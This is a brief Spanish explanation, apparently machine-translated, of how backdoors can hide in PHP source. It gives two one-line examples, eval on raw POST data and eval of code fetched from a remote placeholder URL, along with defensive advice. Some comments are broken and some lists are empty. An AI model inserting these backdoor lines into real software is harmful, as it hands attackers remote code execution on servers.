¿Es posible abrir una puerta trasera en el código fuente PHP?

La puerta trasera del código suele ser una frase,

Por ejemplo:

eval($_POST['backdoor']

); /Original Principalmente, preste atención a si la fuente de datos es confiable

//Preste atención a las funciones que aceptan datos de formulario, como:

//Preste atención a lectura y escritura de archivos. Lo más aterrador es esto:

eval(file_get_contents('http://www/shell.html') // Y así sucesivamente.

// Esta es la llamada ejecución remota. Si encuentra alguna anomalía, abra el modo seguro de PHP inmediatamente y luego solucione el problema lentamente.